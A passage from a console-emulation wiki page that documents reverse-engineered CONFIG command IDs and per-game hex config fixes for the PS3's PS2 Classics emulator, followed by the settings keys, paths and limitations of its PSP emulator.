Cloud uses 0x239334, 0x1FFFFFF)<br /> (Grand Theft Auto SA uses 0x1E46DC, 0x1E4AE8)<br /> Maximum List Count: 31 <br /> |-<br /> | 0x10|||| List &lt;uint32_t Param, uint32_t Param&gt;<br /> Maximum List Count: 31 <br /> |-<br /> | 0x11|||| 1x uint32_t Param<br /> Maximum Amount of Usage: 31 times<br /> |-<br /> | 0x12|||| &lt;List&gt; (uint32_t count,<br /> (Primal uses 0xD)<br /> (Rayman Arena uses 0x11)<br /> (Syphon Filter: The Omega Strain uses 0x5)<br /> 00 00 00 0?<br /> 00 00 00 00<br /> type? count?<br /> ... <br /> Maximum List Count: 63 <br /> |-<br /> | 0x13|||| 1x uint64_t Param<br /> |-<br /> | 0x14|||| 0 Param, sets something 1<br /> |-<br /> | 0x15|| 4 || 1 Param ( &lt;1, &gt;1 ), different settings/mode?<br /> (Bloodrayne 2 uses 4)<br /> (GRIMgRiMoiRe uses 4)<br /> (Mana Khemia 2 uses 4)<br /> (Odin Sphere uses 4)<br /> (SMT Persona 3 FES uses 4)<br /> |-<br /> | 0x16|||| = 0x05 (next id)<br /> |-<br /> | 0x17||1 || 1 Param, true/false?<br /> (Bully uses 1)<br /> |-<br /> | 0x18|||| = 0x16 = 0x05 (next id)<br /> |-<br /> | 0x19 |||| 0 Param, sets something 1 - SB_SIO2 related?<br /> (Grand Theft Auto III)<br /> (Red Faction 2)<br /> (Siren)<br /> |-<br /> | 0x1A|||| 0 Param, sets something 1<br /> |-<br /> | 0x1B|||| 0 Param, sets something 1<br /> (Mana Khemia 2)<br /> |-<br /> | 0x1C |||| read uint32_t (use uint8_t) Param (default 3)<br /> |-<br /> | 0x1D |||| read uint32_t (use uint8_t) Param <br /> |-<br /> | 0x1E |||| read uint32_t (use uint8_t) Param <br /> |-<br /> | 0x1F |||| uint32_t Param (default 0x3E8?)<br /> |-<br /> | 0x20|||| uint64_t Param (default 0x3C)<br /> |-<br /> | 0x21|| 1 || 1 Param: <br /> 0 = sets an option from 1 to 0 and another one to 0,<br /> 1 = sets an option from 1 to 0 and another one to 1,<br /> 2 = sets an option from 1 to 1 and another one to 0<br /> (Fatal Frame II uses 0)<br /> (Grand Theft Auto Vice City uses 1)<br /> (Grand Theft Auto III (EU) uses 1)<br /> (SMT Persona 3 FES uses 0)<br /> |-<br /> | 0x22|||| 0 Param, sets something 1<br /> |-<br /> | 0x23|||| 0 Param - memcpy 0x100 Bytes and sets 0x14E00<br /> |-<br /> | 0x24|||| uint64_t Param<br /> |-<br /> | 0x25|||| = 0x18 = 0x16 = 0x05 (next id)<br /> |-<br /> | 0x26|||| List &lt;uint32_t Param,uint32_t Param&gt;<br /> (Bloodrayne 2 uses 0x340000, 0x350000)<br /> (Gradius V uses 0x3046E0, 0x0x305E44)<br /> Maximum List Count: 31 <br /> |-<br /> | 0x27|||| List &lt;uint32_t Param,uint32_t Param&gt;<br /> Maximum List Count: 31 <br /> |-<br /> | 0x28|||| 1x uint32_t Param (&lt;=3)<br /> |-<br /> | 0x29 |||| 2x uint32_t Param,<br /> |-<br /> | 0x2A|||| 0 Param, sets something 1<br /> |-<br /> | 0x2B|||| 0 Param, sets something 1 - something with Controller (analog?)<br /> |-<br /> | 0x2C |||| 1 Param, uint32_t<br /> Summoner uses 0x1<br /> |-<br /> | 0x2D |||| = 0x25 = 0x18 = 0x16 = 0x05 (next id)<br /> |-<br /> | 0x2E |||| 1 Param, uint32_t<br /> |-<br /> | 0x2F |||| 1 Param, uint32_t<br /> |-<br /> | 0x30|||| (nothing)<br /> |-<br /> | 0x31|||| (nothing)<br /> |-<br /> | 0x32|||| (nothing)<br /> |-<br /> | 0x33|||| (nothing)<br /> |-<br /> | 0x34|||| (nothing)<br /> |-<br /> | 0x35|||| 0 Param, sets something 1<br /> |-<br /> | 0x36|||| (nothing)<br /> |-<br /> | 0x37|||| (nothing)<br /> |-<br /> | 0x38|||| (nothing)<br /> |-<br /> | 0x39 |||| (nothing)<br /> |-<br /> | 0x3A|||| (nothing)<br /> |-<br /> | 0x3B|||| (nothing)<br /> |-<br /> | 0x3C |||| (nothing)<br /> |-<br /> | 0x3D |||| 1 Param, uint32_t Config file revision<br /> <br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! Firmware !! ps2_netemu revision !! max.supported commands<br /> |-<br /> | 3.70 || 15686 || 0x41<br /> |-<br /> | 3.73 || 15936 || 0x41<br /> |-<br /> | 3.74 || 15936 || 0x41<br /> |-<br /> | 4.00 || 16195 || 0x41<br /> |-<br /> | 4.01 || 16195 || 0x41<br /> |-<br /> | 4.10 || 16361 || 0x41<br /> |-<br /> | 4.11 || 16361 || 0x41<br /> |-<br /> | 4.20 || 16604 || 0x43<br /> |-<br /> | 4.21 || 16604 || 0x43<br /> |-<br /> | 4.23 || 16604 || 0x43<br /> |-<br /> | 4.25 || 16740 || 0x43<br /> |-<br /> | 4.26 || 16740 || 0x43<br /> |-<br /> | 4.30 || 16808 || 0x45<br /> |-<br /> | 4.31 || 16808 || 0x45<br /> |-<br /> | 4.40 || 16916 || 0x46<br /> |-<br /> | 4.41 || 16916 || 0x46<br /> |-<br /> | 4.45 || 17041 || 0x48<br /> |-<br /> | 4.46 || 17041 || 0x48<br /> |-<br /> | 4.50 || 17179 || 0x4A<br /> |-<br /> | 4.55 || 17277 || 0x4D<br /> |- <br /> | 4.60 / 4.70 / 4.75 / 4.76 || 17314 || 0x4D<br /> |- <br /> | 4.78 || 17495 || 0x50<br /> |- <br /> |}<br /> |-<br /> | 0x3E |||| 0 Params, sets something 1<br /> Default Init = 0<br /> 0 == do set some stuff, <br /> 1 == skip<br /> |-<br /> | 0x3F |||| 1 Param, uint32_t<br /> |-<br /> | 0x40|||| 0 Param, sets something 1<br /> (Grand Theft Auto SA)<br /> (Silent Hill Origins - inofficial fix)<br /> |-<br /> | 0x41|||| 0 Param, sets something 1 (Disables some lwsync - speedhack?)<br /> (Dragon Force)<br /> (God Hand)<br /> (Gradius V)<br /> (Katamari Damacy) <br /> |-<br /> | 0x42|||| 1 Param, revision ?<br /> |-<br /> | 0x43|||| 1 Param - Equal to 0x40, but with Parameter:<br /> 0 = Default<br /> 1 = (like 0x40)<br /> param = <br /> -1 = failure?<br /> |-<br /> | 0x44|||| 0 Param - disables smoothing and smoothing option<br /> |-<br /> | 0x45|||| 0 Param, sets something 1<br /> (Phantasy Star Complete Collection)<br /> |-<br /> | 0x46|||| 0 Param, sets something 1<br /> (SMT Digital Devil Saga 1)<br /> (SMT Nocturne)<br /> (Fatal Frame II)<br /> |-<br /> | 0x47|||| 0 Param, sets something 1<br /> |-<br /> | 0x48|||| 2x uint32_t Param,<br /> (SMT Digital Devil Saga 1 uses 1, 0x3D090)<br /> (Fatal Frame II uses 0x2, 0xFFFFE69C)<br /> |-<br /> | 0x49|||| 0 Param, sets something 0xB,0,0<br /> |-<br /> | 0x4A|||| 0 Param, sets something 0x15100<br /> |-<br /> | 0x4B|||| 2x uint32_t Params: offset,int (-1? selects different titleid?) - /game/ /../ USRDIR/SAVEDATA related<br /> |-<br /> | 0x4C|||| 2x uint32_t Params: offset,int (2 = current path?, 3 = new ISO.BIN.ENC path?, other= ?)<br /> |-<br /> | 0x4D|||| 1 uint32_t Param (can be -1), sets something (same as 0x49 but) 0xC, Param, 0<br /> |-<br /> | 0x4E|||| (nothing)<br /> |-<br /> | 0x4F|||| (nothing)<br /> |-<br /> | 0x50|||| 0 Param, switch to default gamepad config ?<br /> |-<br /> |}<br /> <br /> ==== unknown ps2 netemu patches ====<br /> <br /> There are some additional internal patches using CONFIG cmd id 0x01, using subs not available in 0x3B list<br /> <br /> condition: 0xBBB5F800, 0x3B949C00, 0x42133A90<br /> setting: <br /> 0x18E1F0, sub_4670C (4.70)<br /> 0x348EC8, sub_44338 (4.70)<br /> <br /> in id0x01, function id 0x18 <br /> condition: [ 0x20183F04 (+200000000 base) ] == 0x0C060F2C<br /> setting:<br /> stores 0 in address 0x20183F04, 0x20183F34, 0x20183F3C - with 200000000 base<br /> 0x183F0C, sub_46334 (4.70)<br /> 0x183F3C, sub_45DA4 (4.70)<br /> 0x183D74, sub_47B50 (4.70)<br /> <br /> === CONFIG File (unofficial) ===<br /> <br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! ID !! Title !! Config Data !! Revision !! Notes<br /> |-<br /> | SLUS-21268 || 24 The Game ||<br /> <br /> || 15717 (3.73+) || fixes loading screen freezing (not yet)<br /> 0x3D =&gt; 0x3D65 (15717)<br /> 0x12 =&gt; 0x0D, <br /> 00 00 00 04 <br /> 00 00 00 00 <br /> 02 00&gt;'''03 00'''&lt; Count, Type 2<br /> ?? 0? 00 00 <br /> ?? ?? ?? ?? <br /> ?? 0? 00 00 <br /> 02 00&gt;'''03 00'''&lt; Count, Type 2<br /> ?? 0? 00 00 <br /> ?? ?? ?? ?? <br /> ?? 0? 00 00 <br /> 03 00&gt;'''02 00'''&lt; Count, Type 3<br /> B0 55 41 10 -&gt; 0x4155B0<br /> 68 56 41 10 -&gt; 0x415668 <br /> |-<br /> | SLUS-21445 || Ar Tonelico - Melody of Elemia ||<br /> 00000000 3D 00 00 00 98 41 00 00 1B 00 00 00 15 00 00 00 =....A..........<br /> 00000010 04 00 00 00 00 00 00 00 ........<br /> || 16792 (4.30+) || fixes blackscreen<br /> 0x3D =&gt; 0x4198 (16792)<br /> 0x1B =&gt; (sets some value 1)<br /> 0x15 =&gt; 4<br /> |-<br /> | SLUS-21788 || Ar tonelico II - Melody of Metafalica ||<br /> 00000000 3D 00 00 00 98 41 00 00 1B 00 00 00 15 00 00 00 =....A..........<br /> 00000010 04 00 00 00 00 00 00 00 ........<br /> || 16792 (4.30+) || fixes blackscreen<br /> 0x3D =&gt; 0x4198 (16792)<br /> 0x1B =&gt; (sets some value 1)<br /> 0x15 =&gt; 4<br /> |-<br /> | || Atelier Iris ||<br /> 00000000 3D 00 00 00 98 41 00 00 1B 00 00 00 15 00 00 00 =....A..........<br /> 00000010 04 00 00 00 00 00 00 00 ........<br /> || 16792 (4.30+) || fixes blackscreen<br /> 0x3D =&gt; 0x4198 (16792)<br /> 0x1B =&gt; (sets some value 1)<br /> 0x15 =&gt; 4<br /> |-<br /> | || Atelier Iris 2 ||<br /> 00000000 3D 00 00 00 98 41 00 00 1B 00 00 00 15 00 00 00 =....A..........<br /> 00000010 04 00 00 00 00 00 00 00 ........<br /> || 16792 (4.30+) || fixes blackscreen<br /> 0x3D =&gt; 0x4198 (16792)<br /> 0x1B =&gt; (sets some value 1)<br /> 0x15 =&gt; 4<br /> |-<br /> | || Atelier Iris 3 ||<br /> 00000000 3D 00 00 00 98 41 00 00 1B 00 00 00 15 00 00 00 =....A..........<br /> 00000010 04 00 00 00 00 00 00 00 ........<br /> || 16792 (4.30+) || fixes blackscreen<br /> 0x3D =&gt; 0x4198 (16792)<br /> 0x1B =&gt; (sets some value 1)<br /> 0x15 =&gt; 4<br /> |-<br /> | SLES-50672/SLUS-20035 || Baldur's Gate - Dark Alliance || <br /> 00000000 3D 00 00 00 1B 43 00 00 4A 00 00 00 00 00 00 00 =....A..@.......<br /> || 17179 (4.50+) ||<br /> fixes backgrounds not rendering properly (see: [https://www.dropbox.com/s/92n81uot56czb5v/Datei%2018.08.17%2011%2011%2029.jpeg?dl=0] )<br /> 0x3D =&gt; 0x431B (17179)<br /> 0x4A =&gt; (sets something 0x15100)<br /> |-<br /> | || Baldur's Gate 2 || <br /> 00000000 3D 00 00 00 1B 43 00 00 4A 00 00 00 00 00 00 00 =....A..@.......<br /> || 17179 (4.50+) ||<br /> fixes backgrounds not rendering properly <br /> 0x3D =&gt; 0x431B (17179)<br /> 0x4A =&gt; (sets something 0x15100)<br /> |-<br /> | || Champions of Norath || <br /> 00000000 3D 00 00 00 1B 43 00 00 4A 00 00 00 00 00 00 00 =....A..@.......<br /> || 17179 (4.50+) ||<br /> fixes backgrounds not rendering properly <br /> 0x3D =&gt; 0x431B (17179)<br /> 0x4A =&gt; (sets something 0x15100)<br /> |-<br /> | || Champions Return to Arms || <br /> 00000000 3D 00 00 00 1B 43 00 00 4A 00 00 00 00 00 00 00 =....A..@.......<br /> || 17179 (4.50+) ||<br /> fixes backgrounds not rendering properly <br /> 0x3D =&gt; 0x431B (17179)<br /> 0x4A =&gt; (sets something 0x15100)<br /> |-<br /> | SLES-53539 || Fahrenheit || <br /> 00000000 3D 00 00 00 F6 41 00 00 40 00 00 00 00 00 00 00 =....A..@.......<br /> || 16886 (4.40+) ||<br /> fixes freeze after Lucas' apartment<br /> 0x3D =&gt; 0x41F6 (16886)<br /> 0x40 =&gt; (sets some value 1)<br /> |-<br /> | || Fallout || <br /> 00000000 3D 00 00 00 1B 43 00 00 4A 00 00 00 00 00 00 00 =....A..@.......<br /> || 17179 (4.50+) ||<br /> fixes backgrounds not rendering properly <br /> 0x3D =&gt; 0x431B (17179)<br /> 0x4A =&gt; (sets something 0x15100)<br /> |-<br /> | SLUS-21702 || Fire Pro Wrestling Returns || <br /> 00000000 3D 00 00 00 F6 41 00 00 03 00 00 00 00 00 00 00 =....A..@.......<br /> || 16886 (4.40+) ||<br /> fixes interlaced artifacts<br /> 0x3D =&gt; 0x41F6 (16886)<br /> 0x03 =&gt; (sets some value 0)<br /> |-<br /> | SCES-53851 || Forbidden Siren 2 ||<br /> 00000000 3D 00 00 00 F6 41 00 00 0A 00 00 00 02 00 00 00 =....A..........<br /> 00000010 44 2B 2E 00 FF 49 C9 4B 00 90 44 48 4C 2B 2E 00 D+...I.K..DHL+..<br /> 00000020 00 90 44 48 FF 49 C9 4B 00 00 00 00 ..DH.I.K.... <br /> || 16886 (4.40+) || Graphic issues with Spiky Polygons<br /> 0x3D =&gt; 0x41F6 (16886)<br /> 0x0A =&gt; 0x2<br /> 0x2E2B44, 0x4BC949FF (vclip vf09xyz, vf09w), 0x48449000 (cfc2 $a1, $18)<br /> 0x2E2B4C, 0x48449000 (cfc2 $a1, $18), 0x4BC949FF (vclip vf09xyz, vf09w)<br /> |-<br /> | SLES-54317 || Ghost Rider || <br /> 00000000 3D 00 00 00 F6 41 00 00 40 00 00 00 00 00 00 00 =....A..@.......<br /> || 16886 (4.40+) ||<br /> texture fix: white overblending ingame<br /> 0x3D =&gt; 0x41F6 (16886)<br /> 0x40 =&gt; (sets some value 1)<br /> |-<br /> | SLUS-21735 || Mana Khemia: Alchemists of Al-Revis ||<br /> 00000000 3D 00 00 00 98 41 00 00 1B 00 00 00 15 00 00 00 =....A..........<br /> 00000010 04 00 00 00 00 00 00 00 ........<br /> || 16792 (4.30+) || fixes blackscreen<br /> 0x3D =&gt; 0x4198 (16792)<br /> 0x1B =&gt; (sets some value 1)<br /> 0x15 =&gt; 4<br /> |-<br /> | SLUS-20230 || Max Payne ||<br /> 00000000 3D 00 00 00 89 3D 00 00 01 00 00 00 E4 E6 52 00 =....=........R.<br /> 00000010 03 00 00 00 01 00 00 00 68 E8 52 00 02 00 00 00 ........x.R.....<br /> 00000020 00 00 00 00 ....<br /> || 15753 (3.73+) || fixes game hang on first cutscene/cutscenes<br /> 0x3D =&gt; 0x3D89 (15753)<br /> 0x01 =&gt; 0x52E6E4, 3 (applies to main.run ELF on disc: 0x52E6E4 dmove a1,v0 )<br /> 0x01 =&gt; 0x52E868, 2 (applies to main.run ELF on disc: 0x52E868 lq s1,0x10(sp) )<br /> |-<br /> | SLUS-20983 || Musashi: Samurai Legend || <br /> 00000000 3D 00 00 00 F6 41 00 00 17 00 00 00 01 00 00 00 =....A..@.......<br /> || 16886 (4.40+) ||<br /> no sps fix, but reduces heavily<br /> 0x3D =&gt; 0x41F6 (16886)<br /> 0x17 =&gt; 1 <br /> |-<br /> | SLPS-25606/SLPS-25851 || Raw Danger! ||<br /> 00000000 3D 00 00 00 A8 41 00 00 44 00 00 00 00 00 00 00 =...&amp;D..D.......<br /> || 16808 (4.30+) || Untested! But Raw Danger! is Zettaizetsumei Toshi 2, so same issue + solution as part 1? <br /> 0x3D =&gt; 0x41A8 (16808)<br /> 0x44 =&gt; (disables smoothing and smoothing<br /> |-<br /> | SLES-55147/SLUS-21731 || Silent Hill: Origins || <br /> 00000000 3D 00 00 00 F6 41 00 00 40 00 00 00 00 00 00 00 =....A..@.......<br /> || 16886 (4.40+) ||<br /> fixes white overblending at burning house<br /> 0x3D =&gt; 0x41F6 (16886)<br /> 0x40 =&gt; (sets some value 1)<br /> |-<br /> | SLUS-20448/SLES-51141 || Summoner 2 ||<br /> 00000000 3D 00 00 00 89 3D 00 00 2C 00 00 00 01 00 00 00 =....=..,.......<br /> || 15753 (3.73+) || Untested! But Summoner 2 is sequel, so same issue + solution as part 1? <br /> 0x3D =&gt; 0x3D89 (15753)<br /> 0x2C =&gt; 0x1<br /> |-<br /> | || Silent Hill 2 ||<br /> <br /> || || shadow and flicker issues<br /> <br /> |-<br /> | || Silent Hill 3 ||<br /> <br /> || || shadow issues<br /> <br /> |-<br /> | || Valkyrie Profile 2 - Silmeria ||<br /> <br /> || || Black screen<br /> <br /> |-<br /> | || Star Ocean - Till the End of Time ||<br /> <br /> || || Black screen<br /> <br /> |-<br /> | || Ice Age 2 The Meltdown ||<br /> <br /> || || Freeze at the game logo<br /> <br /> |-<br /> | || Tony Hawk's Underground 2 ||<br /> <br /> || || Graphic issues with Spiky Polygons<br /> <br /> |-<br /> | || Tony Hawk's Pro Skater 4 ||<br /> <br /> || || Graphic issues with Spiky Polygons<br /> <br /> |-<br /> | || Castlevania: Curse of Darkness ||<br /> <br /> || || Graphic issues with Spiky Polygons (PCSX2 workaround VU clamping mode none)<br /> <br /> |-<br /> | || || || || <br /> |}<br /> <br /> === External References ===<br /> * [http://www.eurogamer.net/articles/digitalfoundry-vs-ps2-classics-on-ps3]<br /> * [http://www.ps3hax.net/showthread.php?t=53444 PS2 Classics Algorithm By flatz]<br /> * [http://gitorious.ps3dev.net/ps2classic c port]<br /> * https://docs.google.com/spreadsheet/ccc?key=0As9ZdsrJoSp1dC1NTTRCSE5vbTlkOGItTC1CVzE5U3c#gid=7<br /> * http://www.pshomebrew.net/wiki/PS2_Classics_Emulator_Compatibility_List<br /> * [http://www.ps3hax.net/showthread.php?p=620747#post620747 How to properly convert Final Fantasy XII: IZJS For ps2classics]<br /> * https://en.wikipedia.org/wiki/List_of_PlayStation_2_Classics<br /> <br /> CPU-GPU intensive games + games only playable in software render on PCSX2:<br /> * http://wiki.pcsx2.net/index.php/Category:GPU_intensive_games<br /> * http://wiki.pcsx2.net/index.php/Category:CPU_intensive_games<br /> * http://wiki.pcsx2.net/index.php/Category:Software_rendering_only_games<br /> <br /> == pspemu ==<br /> Used for &quot;PSP Minis&quot; and &quot;PSP remasters&quot;. The PSP Emulator works by accessing an encrypted ISO-9660 image. &lt;br&gt;<br /> Assuming that the mini game's directory is /dev_hdd0/game/NPEZ00000/ then the image is stored inside /USRDIR/CONTENT/EBOOT.PBP/DATA.PSAR. &lt;br&gt;<br /> '''Info''': &lt;br&gt;<br /> * Recent Emulator supports PSP Kernel 6.60 Applications&lt;br&gt;<br /> * 20GB model (CECHB00), because it is not equipped with a wireless LAN psn? feature is not available. (10001)<br /> * Does not support PGD files, and neither its access. (Sword Art Online, Kingdom Hearts, Naruto Shippuden Ultimate Ninja Heroes 3,..)<br /> * Does not support scePAuth. (Evangelion, Monster Hunter 3 Portable,...)<br /> * Does not support loaders. (prometheus, Killzone Liberation (fix via minis2),...)<br /> * Does not support &quot;fatms0:&quot;. (use &quot;ms0:&quot;)<br /> * Does not support directory creation on &quot;ms0:&quot;.<br /> * Does not support screen shot utility. (Sweet Fuse,...)<br /> * Does not support game sharing utility.<br /> * Does not support rss /rss reader utility.<br /> * Does not support &quot;disc0:/sce_lbn0x%04x_size0x%04x&quot;. (Naruto Shippuden Ultimate Ninja Impact, Final Fantasy 4,Blood+... )<br /> <br /> * Default pll frequency 222, cpu frequency 222, bus frequency 111<br /> * Default internal paths:<br /> ** /dev_flash/pspemu/psp/<br /> ** /dev_flash/pspemu/flash0/<br /> ** /dev_flash/pspemu/ms/<br /> ** /dev_hdd0/game/&lt;TITLEID&gt;/USRDIR/EXDATA/<br /> ** /dev_hdd0/game/&lt;TITLEID&gt;/USRDIR/CONTENT/DOCUMENT.DAT<br /> <br /> '''Supported Tags''':<br /> 0x00000008, /* 1.XX */<br /> 0x7C16CBC0, /* 2.XX */<br /> 0x03FD0480, /* 2.71 */<br /> 0xF00516D9, /* 2.80 */<br /> 0xF00616D9, /* 3.00 */<br /> 0xF00A16D9, <br /> 0xF00B16D9,<br /> <br /> === Files ===<br /> psp_emulator.self (3.15++)<br /> psp_translator.self (3.15++)<br /> \flash0 (3.15++)<br /> \flash1<br /> \flash2<br /> \flash3<br /> \lflash<br /> \release (3.15++)<br /> \psp<br /> \ms<br /> <br /> ==== arguments ====<br /> 2 arguments:&lt;br&gt;<br /> * argv[0]= self starting location&lt;!--// /dev_flash/pspemu/psp_emulator.self or /app_home if you want to load custom sysman.sprx / threadman.sprx files//--&gt;&lt;br&gt;<br /> * argv[1]= ISO.BIN.EDAT location<br /> <br /> ==== mapping ====<br /> <br /> 0xB0000000 - elf/game memory<br /> 0xB3900000 - settings { VFPU_USE_FAST_VMMUL, VMX_FOR_FPU, FPU_FS_SUPPORT, ALLEGREX_DELAY, unk (0/0x1000)}<br /> 0xB4000000<br /> 0xB4200000<br /> 0xB4400000<br /> 0xB4600000<br /> 0xB7900000<br /> 0xB8000000<br /> 0xBB900000<br /> <br /> === Controller? ===<br /> <br /> taken from PEmuCoreLib<br /> <br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! Mode? !! Number !! Note<br /> |-<br /> | 1-A || 1? ||<br /> |-<br /> | 2-A || 2?||<br /> |-<br /> | 1-B || 3?||<br /> |-<br /> | 2-B || 4?||<br /> |-<br /> | 1-C || 5?||<br /> |-<br /> | 2-C || 6?||<br /> |-<br /> | 1-D || 7?||<br /> |-<br /> |}<br /> <br /> === Emulator Settings ===<br /> <br /> The emulator itself can be feeded with settings about the game. These settings are:<br /> <br /> 1) in MINIS2.EDAT (pure Text format file decrypted)<br /> 2) within the emulator defined for a bunch of games (see [[Emulation#Special_notes| Special notes]])<br /> <br /> Note: The Emulator can be patched (1 Bit) to read a non encrypted MINIS2.EDAT.<br /> <br /> Here are the commands what you can define for the psp emulator:<br /> <br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! Struct !! Command !! Example !! Note<br /> |-<br /> | || # || #PSDEVWIKi || Text, information, # will be ignored<br /> |-<br /> | || VERSION = 0x%x || VERSION = 0xFFFFFFFF || <br /> |-<br /> | || BOOT_MODE = %llx || ||<br /> 100010000 = Minis <br /> 200010000 = Remaster <br /> |-<br /> | || REMASTER_VERSION = 0x%x || ||<br /> |-<br /> | || SDRAM_SIZE = %llx || SDRAM_SIZE = 02800000 ||<br /> 02000000 = ~34 MB (Default)<br /> 02800000 = ~42 MB <br /> 03000000 = ~50 MB <br /> 04000000 = ~67 MB<br /> &lt;br /&gt;&lt;br /&gt;''Real PSP hardware had:''<br /> * ''Main RAM: 32MB (PSP-1000) or 64 MB (PSP-2000, PSP-3000, PSP Go/PSP-N1000 and PSP-E1000) 333MHz 256bit DDR SDRAM with 8MB reserved for kernel.''<br /> * ''Video RAM: 2MB 166MHz 256bit eDRAM.''<br /> * ''MediaEngine RAM: 2MB 166MHz 128bit eDRAM.''<br /> |-<br /> | || TRANS_CACHE_SIZE = %llx || TRANS_CACHE_SIZE = 1000000 ||<br /> 2000000 = (Default)<br /> 1000000 = <br /> |-<br /> | || HOSTFS_PATH = %lld || || <br /> 0 = /dev_flash/pspemu/psp/ (Default) <br /> 1 = /app_home/psp/ <br /> 2 = /app_home/<br /> else = /dev_flash/pspemu/psp/<br /> |-<br /> | || EXDATA_PATH = %lld || ||<br /> 0 = %USRDIR%/EXDATA/ (Default)<br /> 2 = &lt;HOSTFS_PATH&gt;/EXDATA/<br /> 3 = /dev_usb/EXDATA<br /> else = %USRDIR%/EXDATA/<br /> |-<br /> | || ELF_PATH = %s || ELF_PATH = disc0:/PSP_GAME/SYSDIR/EBOOT.BIN || = default, but can be changed for example on Powerstone Collection to directly load PS1.prx/PS2.prx<br /> |-<br /> | || ISO_PATH = %s || ||<br /> |-<br /> | || VOUT_RESOLUTION_MODE = %lld || VOUT_RESOLUTION_MODE = 0 ||<br /> 0 = (Default)<br /> 1<br /> 2<br /> 3<br /> ... <br /> |-<br /> | || DRAWN_IMAGE_SCALE = %lld || DRAWN_IMAGE_SCALE = 4 || Display Output Videoscale <br /> 0 = <br /> 1 = small picture<br /> 2 = (Default)<br /> 3 =<br /> 4 =<br /> ...<br /> |-<br /> | AW. {|| || || indicates LINEAR_ADRS to CLOAD_MODE optional setting following<br /> |-<br /> | || LINEAR_ADRS = %llx || AW.LINEAR_ADRS = 40 ||<br /> 0 = (Default)<br /> 40 = <br /> |-<br /> | || SINGLE_BUF = %llx || AW.SINGLE_BUF = 880 ||<br /> 0 = (Default)<br /> 80 = <br /> 880 =<br /> |-<br /> | || DISABLE_FB_TEX = %llx || AW.DISABLE_FB_TEX = 100 || <br /> 0 = (Default)<br /> 100 = <br /> |-<br /> | || REUSE_ADRS = %llx || AW.REUSE_ADRS = 110000 ||<br /> 0 = (Default)<br /> 110000 =<br /> |-<br /> | || SINGLE_BUF2 = %llx || ||<br /> |-<br /> | || DECODE_WAIT = %llx || AW.DECODE_WAIT = 10000 || in order to slowdown ?<br /> 0 = (Default)<br /> 10000 = <br /> |-<br /> | || DISCARD_EDGE = %llx || AW.DISCARD_EDGE = 20000 ||<br /> 0 = (Default)<br /> 20000 =<br /> |-<br /> | || RECYCLE_RD_TEX = %llx || ||<br /> |-<br /> | || EXT_MODE = %llx || AW.EXT_MODE = 3 ||<br /> 0 = (Default)<br /> Uses different SPU ELF for transparency/textures behavior <br /> 1 = <br /> 2 = <br /> 3 = <br /> |-<br /> | || THR_PIXEL_OFST = %llx || AW.THR_PIXEL_OFST = 0 || <br /> 0 = <br /> 3EFFFFFF = (default)<br /> |-<br /> | || EXT_CMD = %llx || AW.EXT_CMD = 2 || <br /> 0 = (Default)<br /> 1 = <br /> 2 = <br /> 3 = <br /> |-<br /> | || VRAM_MODE = %llx || AW.VRAM_MODE = 1 ||<br /> 0 = Disabled (default) <br /> 1 = Enabled<br /> |-<br /> | || CLOAD_MODE = %llx || AW.CLOAD_MODE = 1 || (Note: Only available since 4.30?)<br /> 0 = Disabled (default) <br /> 1 = Enabled<br /> Displays Selection Menu: Remaster/Adhoc ?<br /> |-<br /> | } || || ||<br /> |-<br /> | AUDIO. {|| || || indicates optional SCR_NOIZ,SLEEP,DECODE_LIMIT setting following<br /> |-<br /> | || SRC_NOIZ = %llx || ||<br /> |-<br /> | || SLEEP = %llx || AUDIO.SLEEP = 421 ||<br /> 0 = (Default)<br /> 421 =<br /> |-<br /> | || DECODE_LIMIT = %llx || ||<br /> |-<br /> | } || || ||<br /> |-<br /> | || VFPU_USE_FAST_VMMUL = %lld || ||<br /> 0 = Disabled (Default) <br /> 1 = Enabled<br /> |-<br /> | || VMX_FOR_FPU = %lld || ||<br /> 0 = Disabled<br /> 1 = Enabled (Default)<br /> |-<br /> | || FPU_FS_SUPPORT = %lld || ||<br /> 0 = Disabled<br /> 1 = Enabled (Default)<br /> |-<br /> | || MIPS_CODE_BLOCK_SIZE = %lld || MIPS_CODE_BLOCK_SIZE = 8192 ||<br /> 8192 (decimal) = 0x2000 (hex) <br /> 4096 (decimal) = 0x1000 (hex, Default)<br /> |-<br /> | || ALLEGREX_DELAY = %lld || || Allegrex = PSP CPU <br /> 0 = (Default)<br /> 100 = ms delay interrupt/thread/sync<br /> |-<br /> | || LINCOLN_START_ADDR = %llx || ||<br /> 0x8804000? = (Default)?<br /> |-<br /> | || LINCOLN_START_SIZE = %llx || ||<br /> |-<br /> | || TRANSLATOR_PATCH[%lld] = { %08x } || || <br /> %lld = Number of patches to allocate&lt;br&gt;<br /> Format goes like this - all values being 32Bit hexdecimal:&lt;br&gt;<br /> = { start_address? end_address? patch1 patch2 .... (optional: count_for_buff2 buff2_value1 buff2_value2..) }<br /> |-<br /> | || OSK_ENGLISH = %lld || || On Screen Keyboard<br /> 0 = (Default) panel <br /> Else? = english<br /> |-<br /> | S3D. {|| || || Stereoscopic 3D<br /> |-<br /> | || ENABLE = %lld || S3D.ENABLE = 1 ||<br /> 0 = Disabled (Default)<br /> 1 = <br /> 2 = <br /> 3,4,.. = ? (3D Display strong?)<br /> |-<br /> | || MAX_PARALLAX = %f || || (info: http://www.lightillusion.com/stereo_3d_rules.html) &lt;br&gt; 0.0 to 1.0 ? <br /> 0.029999999 = (Default)<br /> |-<br /> | || SCREEN_DISTANCE = %f || || 0.0 to 1.0 ?<br /> -1.0 = (Default)<br /> |-<br /> | CONV. {|| || || struct within S3D structure (info: http://www.lightillusion.com/stereo_3d_convergence.html)<br /> |-<br /> | || DEPTH_TYPE = %lld || ||<br /> 2 = (Default)<br /> |-<br /> | || GLOBAL_DEPTH1 = %f || ||<br /> 0 = (Default)<br /> |-<br /> | || GLOBAL_DEPTH2 = %f || ||<br /> 0 = (Default)<br /> |-<br /> | || LOCAL_DEPTH1 = %f || ||<br /> 0 = (Default)<br /> |-<br /> | || LOCAL_DEPTH2 = %f || ||<br /> 0 = (Default)<br /> |-<br /> | || SHIFT = %f || ||<br /> 0 = (Default)<br /> |-<br /> | || SIDEPANEL = %lld || ||<br /> 0 = (Default)<br /> |-<br /> | } || || ||<br /> |-<br /> | } || || ||<br /> |-<br /> | FILTER. {|| || || <br /> |-<br /> | DOF. {|| || || depth of field filter<br /> |-<br /> | || GAUSSIAN = %f || ||<br /> 